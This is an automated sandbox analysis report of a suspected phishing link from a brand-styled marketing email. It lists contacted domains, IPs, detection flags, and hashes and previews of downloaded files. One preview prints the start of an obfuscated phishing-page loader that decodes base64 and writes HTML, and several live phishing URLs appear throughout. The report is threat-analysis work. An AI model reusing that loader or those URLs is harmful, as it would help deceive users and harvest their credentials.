                          www.google.com
                          172.217.16.132
                          truefalse
                            high
                            a6b7c1be5ea686d6c0c05e957.alkitipo.com
                            104.21.5.130
                            truefalse
                              high
                              yg.dianausil.com
                              172.67.214.184
                              truetrue
                                unknown
                                mailgun.org
                                34.102.239.211
                                truefalse
                                  high
                                  email.mg.dior.com.sg
                                  unknown
                                  unknownfalse
                                    high
                                    via.placeholder.com
                                    unknown
                                    unknownfalse
                                      high
                                      171.39.242.20.in-addr.arpa
                                      unknown
                                      unknownfalse
                                        high
                                        NameMaliciousAntivirus DetectionReputation
                                        https://a6b7c1be5ea686d6c0c05e957.alkitipo.com/cdn-cgi/challenge-platform/h/g/scripts/jsd/f3b948d8acb8/main.js?false
                                        • Avira URL Cloud: phishing
                                        unknown
                                        https://a6b7c1be5ea686d6c0c05e957.alkitipo.com/false
                                          unknown
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/d/922c4a999a2565e0/1742380195700/ox5WbSDMgn24l14false
                                            high
                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/966088071:1742376849:e-pQSDz4Bmg_iVm7Jg9F7dZQ1GSaY_NvFcx7L8UKqvA/922c4a999a2565e0/bwElmkdodDWQOGj80U6g0vbisR.D21TPXcrcLoLH45I-1742380194-1.1.1.1-abhJq1qSwZwA3Vl_tW6mw1yQmgoQwbtMA82LndI9lmWZgSxh0FEP4lOMhDDG8mQTfalse
                                              high
                                              https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                                high
                                                https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                  high
                                                  https://developers.cloudflare.com/favicon.pngfalse
                                                    high
                                                    https://yg.dianausil.com/IDLK/#contactfalse
                                                      unknown
                                                      https://challenges.cloudflare.com/turnstile/v0/api.jsfalse
                                                        high
                                                        https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.jsfalse
                                                          high
                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=922c4a999a2565e0&lang=autofalse
                                                            high
                                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1false
                                                              high
                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/922c4a999a2565e0/1742380195702/13a2904f9ce012e84732ed91b64145029ca303305d8e5d33f08cbc9075eb3842/89GlKLJ1vXuz6E7false
                                                                high
                                                                https://a6b7c1be5ea686d6c0c05e957.alkitipo.com/?cf_captcha=verifiedfalse
                                                                • Avira URL Cloud: phishing
                                                                unknown
                                                                https://a6b7c1be5ea686d6c0c05e957.alkitipo.com/favicon.icofalse
                                                                • Avira URL Cloud: phishing
                                                                unknown
                                                                https://luux.viugbu.ru/jawari@iczbbjabfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/k0ed6/0x4AAAAAABBagSav2GMcq5ob/auto/fbE/new/normal/auto/false
                                                                  high
                                                                  https://a6b7c1be5ea686d6c0c05e957.alkitipo.com/cdn-cgi/challenge-platform/h/g/jsd/r/0.38274867399469387:1742376653:KH8maKPuUqiEMLR5OlzLIk_YKRD4m2JdO_m0T_WtFio/922c4a9648889f21false
                                                                  • Avira URL Cloud: phishing
                                                                  unknown
                                                                  https://yg.dianausil.com/IDLK/true
                                                                    unknown
                                                                    https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallbackfalse
                                                                      high
                                                                      https://email.mg.dior.com.sg/c/eJwUy0uOhCAQANDTwJLUBwpdsJiN9ygK6CZq7Dhmzj_pA7xWBKxq8r1gjsS4AoF_l8iAiWysYzGVPNZsFoEqqg1tMPwsBJSAccHMgByi1kXYgKXnLpFchPMV2rzuYNcZfl_-KO_n-Tj-cbQ52lRqNqw9dZVFmhgYpL6mHPTY5zM_1xc62vxddBwuwn620Hb_V-g_AAD__9XhM88&false
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://a6b7c1be5ea686d6c0c05e957.alkitipo.com/cdn-cgi/challenge-platform/scripts/jsd/main.jsfalse
                                                                      • Avira URL Cloud: phishing
                                                                      unknown
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      104.18.94.41
                                                                      challenges.cloudflare.comUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      104.21.23.248
                                                                      unknownUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      151.101.66.137
                                                                      code.jquery.comUnited States
                                                                      54113FASTLYUSfalse
                                                                      35.190.80.1
                                                                      a.nel.cloudflare.comUnited States
                                                                      15169GOOGLEUSfalse
                                                                      172.67.214.184
                                                                      yg.dianausil.comUnited States
                                                                      13335CLOUDFLARENETUStrue
                                                                      104.16.6.189
                                                                      developers.cloudflare.comUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      104.21.5.130
                                                                      a6b7c1be5ea686d6c0c05e957.alkitipo.comUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      142.250.184.228
                                                                      unknownUnited States
                                                                      15169GOOGLEUSfalse
                                                                      104.16.2.189
                                                                      unknownUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      172.67.148.100
                                                                      luux.viugbu.ruUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      104.18.95.41
                                                                      unknownUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      34.102.239.211
                                                                      mailgun.orgUnited States
                                                                      15169GOOGLEUSfalse
                                                                      172.217.16.132
                                                                      www.google.comUnited States
                                                                      15169GOOGLEUSfalse
                                                                      104.17.25.14
                                                                      cdnjs.cloudflare.comUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      IP
                                                                      192.168.2.4
                                                                      192.168.2.6
                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                      Analysis ID:1642816
                                                                      Start date and time:2025-03-19 11:28:42 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 3m 24s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:browseurl.jbs
                                                                      Sample URL:http://email.mg.dior.com.sg/c/eJwUy0uOhCAQANDTwJLUBwpdsJiN9ygK6CZq7Dhmzj_pA7xWBKxq8r1gjsS4AoF_l8iAiWysYzGVPNZsFoEqqg1tMPwsBJSAccHMgByi1kXYgKXnLpFchPMV2rzuYNcZfl_-KO_n-Tj-cbQ52lRqNqw9dZVFmhgYpL6mHPTY5zM_1xc62vxddBwuwn620Hb_V-g_AAD__9XhM88&
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:15
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Detection:MAL
                                                                      Classification:mal92.phis.evad.win@27/30@42/16
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe, TextInputHost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 23.199.214.10, 142.250.186.142, 142.250.185.67, 142.250.181.238, 64.233.184.84, 142.250.186.174, 172.217.18.14, 172.217.18.110, 199.232.214.172, 142.250.184.206, 142.250.184.202, 142.250.184.195, 142.250.185.78, 199.232.210.172, 216.58.206.35, 172.217.23.99, 142.250.185.110, 20.12.23.50, 20.242.39.171, 172.202.163.200
                                                                      • Excluded domains from analysis (whitelisted): fonts.googleapis.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • VT rate limit hit for: http://email.mg.dior.com.sg/c/eJwUy0uOhCAQANDTwJLUBwpdsJiN9ygK6CZq7Dhmzj_pA7xWBKxq8r1gjsS4AoF_l8iAiWysYzGVPNZsFoEqqg1tMPwsBJSAccHMgByi1kXYgKXnLpFchPMV2rzuYNcZfl_-KO_n-Tj-cbQ52lRqNqw9dZVFmhgYpL6mHPTY5zM_1xc62vxddBwuwn620Hb_V-g_AAD__9XhM88&amp;
                                                                      No simulations
                                                                      No context
                                                                      No context
                                                                      No context
                                                                      No context
                                                                      No context
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:ASCII text, with very long lines (65447)
                                                                      Category:downloaded
                                                                      Size (bytes):89501
                                                                      Entropy (8bit):5.289893677458563
                                                                      Encrypted:false
                                                                      SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                      MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                      SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                      SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                      SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                      Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:ASCII text, with very long lines (48238)
                                                                      Category:downloaded
                                                                      Size (bytes):48239
                                                                      Entropy (8bit):5.343270713163753
                                                                      Encrypted:false
                                                                      SSDEEP:768:+CbPzHMb42QOna0rhgaqC2DdONTjwzsLSh0ZsC3Y2zIijkKY1LBep7iFFQ7Srv3h:gb425na0rhgaqDnzs22z3kH
                                                                      MD5:184E29DE57C67BC329C650F294847C16
                                                                      SHA1:961208535893142386BA3EFE1444B4F8A90282C3
                                                                      SHA-256:DD03BA1DD6D73643A8ED55F4CEBC059D673046975D106D26D245326178C2EB9D
                                                                      SHA-512:AF3D62053148D139837CA895457BEEF7620AA52614B9A08FD0D5BEF8163F4C3B9E8D7B2A74D29079DB3DACC51D98AE4A5DC19C788928E5A854D7803EBB9DED9C
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.js
                                                                      Preview:"use strict";(function(){function Ht(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){Ht(l,o,c,v,h,"next",s)}function h(s){Ht(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:ASCII text, with very long lines (48238)
                                                                      Category:downloaded
                                                                      Size (bytes):48239
                                                                      Entropy (8bit):5.343270713163753
                                                                      Encrypted:false
                                                                      SSDEEP:768:+CbPzHMb42QOna0rhgaqC2DdONTjwzsLSh0ZsC3Y2zIijkKY1LBep7iFFQ7Srv3h:gb425na0rhgaqDnzs22z3kH
                                                                      MD5:184E29DE57C67BC329C650F294847C16
                                                                      SHA1:961208535893142386BA3EFE1444B4F8A90282C3
                                                                      SHA-256:DD03BA1DD6D73643A8ED55F4CEBC059D673046975D106D26D245326178C2EB9D
                                                                      SHA-512:AF3D62053148D139837CA895457BEEF7620AA52614B9A08FD0D5BEF8163F4C3B9E8D7B2A74D29079DB3DACC51D98AE4A5DC19C788928E5A854D7803EBB9DED9C
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.js
                                                                      Preview:"use strict";(function(){function Ht(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){Ht(l,o,c,v,h,"next",s)}function h(s){Ht(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:HTML document, ASCII text, with very long lines (65364)
                                                                      Category:downloaded
                                                                      Size (bytes):204291
                                                                      Entropy (8bit):4.804301592507227
                                                                      Encrypted:false
                                                                      SSDEEP:1536:gkWmWcnVkVobLDd9GpXX5xsrzU9mSBMJQHeWmWcnVkVobLDd9GpXX5xsrzU9mSBa:fV/NOxd9qV/NOxd9fWV
                                                                      MD5:F8D331D922F9A137F482817DAE714024
                                                                      SHA1:DD66C4B798581BAB6AD52EABDE1513097E359461
                                                                      SHA-256:3C380B2C589855D841ADE082BE1ED1DBF4691223DD4D4ACCF53293C9F024496B
                                                                      SHA-512:3E40BDB55729E145B44A980AB7D9096D6E95CDFA99B288E9BFE9EC238BDF25D6B09D11C6F6F6F72BD33493DC1598AFBF945C59DF530348331E1C9EE4C8DA782D
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://yg.dianausil.com/IDLK/
                                                                      Preview:<script>.wWHqVAHsZo = atob("aHR0cHM6Ly84U3EuZGlhbmF1c2lsLmNvbS9JRExLLw==");.MoQOnQUGtq = atob("bm9tYXRjaA==");.qhTNQDSBRD = atob("d3JpdGU=");.if(wWHqVAHsZo == MoQOnQUGtq){.document[qhTNQDSBRD](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxsaW5rIHJlbD0iaWNvbiIgaHJlZj0iaHR0cHM6Ly9kZXZlbG9wZXJzLmNsb3VkZmxhcmUuY29tL2Zhdmljb24ucG5nIiB0eXBlPSJpbWFnZS94LWljb24iPgogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPgogICAgPHNjcmlwdD4KICAgIGNvbnN0IGxaeEZwbkVxVUIgPSB7CiAgZ2V0KGVSeFNac3hSZGMsIGpCdVNoelFMQnMpIHsKICAgIGNvbnN0IHhvRkNxdXR1emwgPSBbLi4uakJ1U2h6UUxCc10KICAgICAgLm1hcChBUlRlbHdFbURSID0+ICsoJ+++oCcgPiBBUlRlbHdFbURSKSkKICAgICAgLmpvaW4oJycpOwogICAgY29uc3QgZWNNbFZLZnBDVyA9IHhvRkNxdXR1emwucmVwbGFjZSgvLns4fS9nLCBEUVFBQkxtWEN
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 37828, version 1.0
                                                                      Category:downloaded
                                                                      Size (bytes):37828
                                                                      Entropy (8bit):7.994199601770781
                                                                      Encrypted:true
                                                                      SSDEEP:768:TLreREud92B1C5buEpioxWe6O1ESHFnLQkbknuF1dcjI5djeBX:Tu68248oxWe6O19H1zwnubdk
                                                                      MD5:50B140B1E97D859D6D0603414F4298EE
                                                                      SHA1:500E4872EE1BA9CF89F1BA626D64987B0F9AB5C9
                                                                      SHA-256:FDC9964050BFA24C27A3C76C6791B3674292A5F352CBC83D7A4DC49595BC3FB1
                                                                      SHA-512:55EF84E956A7943E3FC61A8A349E64E9F35B7DFC63402AB52B995F43A7CD4B1D2ACD300126DCDD610D0B106AF426848F998CCF154F712034422D242D6AD9130D
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://fonts.gstatic.com/s/montserrat/v29/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2
                                                                      Preview:wOF2..............~....C..........................^...V..D?HVAR.'?MVARF.`?STAT.8'2..L+..|.../~.....$.u....0..x.6.$.... .....e..([.lq...{En.0..I..h...[....-y2..)..@(.*....T...K....$E.U.uA.b...AO..CU"O.W.]7..'............a.@...kF9.3.....xV..7.tg4#Ol.x}o.M...w...Q..))..-.i.R..&.P.......N..[F.C...x..9.|.;......d$..L.<......=.M.S..HlLHr.#+.S}..+..C....D..'^..~.}..TeT`%.......^..$....0....1 A.. ...bm..]T.E...n;._Qqm....RK.....=....\{.h.O&.D$.U......YS U..i...@.:W........p..pS....-.w.EQwp@.....},.G.@,....0IAV....P...~..0.....8..f...5..Os...5..P...n&wS+.P:.7.e.$t~.s_...z..3..Z.....}.A..2Uj...@{.:Ln.}.t.....i.>Kl.."RQ..h.;.........%...eY.E?...W..00(.z.ml.J.TPP...........G...6.=.Z%...\T....W..q...9D.m...)6..1..\.....v7......U..jr..-i.c.3iL..,\..!...b.d.A...d..C.....Ra:Q.!.M,.e.S*MC$$M.w..c.151=.m..o@.G$.X..P'..|.E."..Z.k......i"......S8..@.d.....2..t..........{..X.]SN..$....K....j5..e..,.%...T..)+.";@.v...9.R..]......,...W.iY...f..r...Q.FY.P.#...X...S
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:downloaded
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://luux.viugbu.ru/jawari@iczbbjab
                                                                      Preview:1
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                      Category:downloaded
                                                                      Size (bytes):48316
                                                                      Entropy (8bit):5.6346993394709
                                                                      Encrypted:false
                                                                      SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                      MD5:2CA03AD87885AB983541092B87ADB299
                                                                      SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                      SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                      SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                      Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 40128, version 1.0
                                                                      Category:downloaded
                                                                      Size (bytes):40128
                                                                      Entropy (8bit):7.994526034157349
                                                                      Encrypted:true
                                                                      SSDEEP:768:Vce3jkow68wmT4IBX0tXdlSirS61gSjcz0GPwHbP+w2jec56O:VcI/iEEEtXdFJj+0GPwHbP+w5rO
                                                                      MD5:9A01B69183A9604AB3A439E388B30501
                                                                      SHA1:8ED1D59003D0DBE6360481017B44665153665FBE
                                                                      SHA-256:20B535FA80C8189E3B87D1803038389960203A886D502BC2EF1857AFFC2F38D2
                                                                      SHA-512:0E6795255B6EEA00B5403FD7E3B904D52776D49AC63A31C2778361262883697943AEDCB29FEEE85694BA6F19EAA34DDDB9A5BFE7118F4A25B4757E92C331FECA
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3yUBA.woff2
                                                                      Preview:wOF2..............$....F..........................p.....t?HVAR...`?STAT.N'...B..~.../~.....`..i..X.0..j.6.$..,. .... ..N[{.q.v...Lw.Q..o..J...6.Z.g.F.n..g\{t....%.!3)....sS.o...$."c.^<.iZc.I]c....0+. ..I..9.H.3..B.&.....'e....5.p.R(.j~\=..Wt.{..1.[u..Fn..<.-g.3..L..o.....E.-Q.........I..-/.4....{.Uj...3.K...g.Z....0...2)%.{......gN.../f.7....o.K....^V...!j...<...gf....\XjI.<p.PJh.4....*,*.S....&.C...R..,@ba..<..z.|.X.&.(.mf.w[..l.35Mp...A.A.=d........fj...}W6..y....[...i.......!........NLND....n'"...N*k)0<n.P.......w.j..>9.vV...Z.`.$$!.".(.`ATV.,..0.]3.<.d(...-s...2.w....P@.&...-.9x7.'....Sg.N=m.=....(..))-bA<.x.......=@4qs..Ss......K...{.=H.......z...NUS....Y..6.K.......n.....F4.B....=w.....+..F3...fB..........y1...,.(...`,..&vIrP.^.fiQY..5....H.a......q...s."..\..':.xK}...fU.z.j.......$L.......f.g&....R...!.Wmew3.1%2W.'"6u..r.q"F.......~i{..9xN.g.X..NMx.H.s@.8..J.t.SP.C`-GU)G/'..6".+......f..n..Aw....r....l.<r...Cke..D....T/."..c..mj..
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                      Category:dropped
                                                                      Size (bytes):937
                                                                      Entropy (8bit):7.737931820487441
                                                                      Encrypted:false
                                                                      SSDEEP:24:2PUSIn/IylOgX9qCigRmHQxlCNebarFY9:2PLCHlOgXQ9Oie+rw
                                                                      MD5:FC3B7BBE7970F47579127561139060E2
                                                                      SHA1:3F7C5783FE1F4404CB16304A5A274778EA3ABD25
                                                                      SHA-256:85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
                                                                      SHA-512:49FA22DE92BEBEDE28BB72F7C7902C01D59E56723811629E40C8A887E34FD0B392A9DF169A238BDD8E46D984E76312D75B2644B8611C66A71A559C1B6834DE6C
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:.PNG........IHDR... ... .....szz.....pHYs...........~....[IDATX..KHTQ..g...&....!pY-.q.-B.H....Q`HY.wL.L....D....M.hS.H.w..wF..y|..s.9..2.6s..w.....}.9........m.{"."q.Q..x.ZO..h.U.y.3.].^.M. .0...D7L...D....w...a$}/u..)n....@......8.V.y6..X..U.QgA.\.Q.F..~.>..'......g.=.2..VW..\....`1d......q..........6...Y...L.g9....l.-...z.t.CE|...d5...b..H?....4...+.J.....9.E..-. ..R$.D.S....7...b..i..\q.?0..9....,d&...mw.L..&N.FpM"...;.......O[db/...-....Q<..WDhN.nu....%...m......A.S.._.>w...0.u..TJ...)......u..(=.!.."zTE0....J....ki#..n0..^.._"..D.....u..p.*=.&d..1....8...f.kR.3G6.t....Vcl.o=~/.$./...I.....$............(]...9.,...i....e... ..........._....@.h./......./U2Nd..........U..|...{.(...y....`.|....z\..z.@.o5...-...O.T.TL).5...y.m.......zZ........:..B..i..w...?!...m-xi.....;...e.0.A...W.}..E...u......h0O./...U..jA..., ..{.(......._=.w#.~..<..g.Vz....o@.e...........2.....T....IEND.B`.
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:PNG image data, 90 x 53, 8-bit/color RGB, non-interlaced
                                                                      Category:downloaded
                                                                      Size (bytes):61
                                                                      Entropy (8bit):4.022997040570905
                                                                      Encrypted:false
                                                                      SSDEEP:3:yionv//thPlQ6tHxl/k4E08up:6v/lhP3F7Tp
                                                                      MD5:9560E3752D9C4EDA2F6007F4F8F8F1BD
                                                                      SHA1:4BD4B5670BB3FF18D7FC8E83B4D12C885ECED0EB
                                                                      SHA-256:A9BD68AC39DA462D28E997177AC1014DD6F5CB00CB65FDF1532FD7207849D9CE
                                                                      SHA-512:4C08B621275D7606DDADC8E204E32FFDCBC16A0C99A5CDCA56F7A4EBCC80600134F8A016B1846EBCE9E1288BEF2B659EE1436A774B5D0FEA50B64CAE4EC6E983
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/d/922c4a999a2565e0/1742380195700/ox5WbSDMgn24l14
                                                                      Preview:.PNG........IHDR...Z...5.....Nhk.....IDAT.....$.....IEND.B`.
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:ASCII text, with very long lines (1572)
                                                                      Category:downloaded
                                                                      Size (bytes):20529
                                                                      Entropy (8bit):5.341675812562837
                                                                      Encrypted:false
                                                                      SSDEEP:384:As25lCf5CgCPCrCyUC/qY4+C4CYCpCfMC1CWC6CyhC/qY4XCNCtCiCfDCOCdCBCC:gKhOoJUaRbn07Un9JhaEqOrELg2Jaa77
                                                                      MD5:5EB51653E41419D8489B3E2EA832A2B6
                                                                      SHA1:EA65E6995D1492971BD97FF5FB0C4276EC6EE384
                                                                      SHA-256:1FC4E404D32B7FB6FA043CD2A72C9EA3A86D6E0DA1F8F80062D6415202382680
